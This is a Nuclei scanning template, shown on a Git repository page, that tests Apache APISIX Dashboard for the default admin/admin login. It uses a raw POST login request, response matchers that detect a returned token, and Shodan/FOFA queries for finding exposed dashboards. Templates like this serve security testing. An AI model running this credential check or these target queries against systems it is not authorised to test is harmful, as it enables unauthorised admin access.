daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/default-logins/apache/apisix-default-login.yaml

42 lines
871 B
YAML
Raw Blame History

id: apisix-default-login
info:
name: Apache Apisix Default Login
author: pdteam
severity: critical
tags: apisix,apache,default-login
metadata:
shodan-query: title:"Apache APISIX Dashboard"
fofa-query: title="Apache APISIX Dashboard"
product: https://apisix.apache.org
requests:
- raw:
- |
POST /apisix/admin/user/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Authorization:
Content-Type: application/json;charset=UTF-8
{"username":"{{user}}","password":"{{pass}}"}
attack: pitchfork
payloads:
user:
- admin
pass:
- admin
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"data"'
- '"token"'
- '"code":0'
condition: and
Reference in New Issue View Git Blame Copy Permalink